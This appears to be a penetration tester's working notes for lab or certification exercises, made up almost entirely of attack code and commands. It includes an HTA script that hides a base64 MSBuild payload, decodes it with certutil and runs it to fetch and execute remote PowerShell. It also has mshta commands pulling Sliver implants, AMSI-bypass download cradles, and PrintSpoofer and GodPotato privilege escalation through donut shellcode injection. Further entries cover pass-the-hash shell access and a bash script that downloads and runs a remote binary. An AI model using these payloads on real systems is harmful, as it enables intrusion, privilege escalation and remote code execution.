var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDUuMjQ4L2xhcmdlMS5wczEnKSB8IGlleCI7CiAgICAgICAgICAgIFJ1bnNwYWNlIHJzID0gUnVuc3BhY2VGYWN0b3J5LkNyZWF0ZVJ1bnNwYWNlKCk7CiAgICAgICAgICAgIHJzLk9wZW4oKTsKICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7CiAgICAgICAgICAgIHBzLlJ1bnNwYWNlID0gcnM7CiAgICAgICAgICAgIHBzLkFkZFNjcmlwdChjbWQpOwogICAgICAgICAgICBwcy5JbnZva2UoKTsKICAgICAgICAgICAgcnMuQ2xvc2UoKTsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CgoKICAgICAgICAgICAgICAgIH0KCgogICAgICAgICAgICB9CgoKCgogICAgICAgIF1dPgogICAgICA8L0NvZGU+CiAgICA8L1Rhc2s+CiAgPC9Vc2luZ1Rhc2s+CjwvUHJvamVjdD4K > c:\\windows\\temp\\enc3.txt;certutil -decode c:\\windows\\temp\\enc3.txt c:\\windows\\temp\\d.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\d.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Create shortcut files
C:\Windows\System32\mshta.exe http://10.8.0.154/sliver64.htaC:\Windows\System32\mshta.exe http://10.8.0.154/sliver86.htaC:\Windows\System32\mshta.exe http://10.8.0.154/large1.htaSE Impersonate
Method 1
- Use the file generated from sliverphollow from above sph.exe
- copy ‘/opt/Tools/privesc-windows/PrintSpoofer64.exe’
cp /opt/Tools/privesc-windows/PrintSpoofer64.exe .
upload sph.exe
./donut -i /home/jay/osep/challenge6/resources_development/PrintSpoofer64.exe -a 2 -b 2 -o /tmp/payload.bin -p '-c c:\windows\temp\sph.exe'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
method 2
Sharp.ps1
# PowerShell script to download and execute a script from a specified URL
$url = "http://10.8.2.41/amsi64.txt"
$scriptContent = (New-Object System.Net.WebClient).DownloadString($url)
Invoke-Expression $scriptContent
upload Godpotato.exe
GodPotato-NET4.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"
Extra this works too
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
Getting Shells
cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.8.0.154/sliver64.hta"(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.8.0.154:80/amsi64.txt%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"
Bad.sh
#!/bin/bash
# Define the URL and local file name
URL="http://10.8.2.41/bad"
FILE_NAME="downloaded_binary"
# Download the file
curl -o $FILE_NAME $URL
# Check if the download was successful
if [ -f "$FILE_NAME" ]; then
echo "Download successful."
# Make the file executable
chmod +x $FILE_NAME
# Execute the file
echo "Executing the file..."
./$FILE_NAME
else
echo "Failed to download the file."
fi
wget http://10.10.14.5/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh
Unmanaged Powershell Sliver
https://github.com/mmnoureldin/UnmanagedPowerShell/tree/master
We downloaded and compiled the UnmangedPowershell.exe
then used donut to have it as shellcode file
./donut -i /home/jay/htb/mist/UnmanagedPowerShell.exe -o /home/jay/htb/mist/powershell.bin
execute-shellcode -i powershell.bin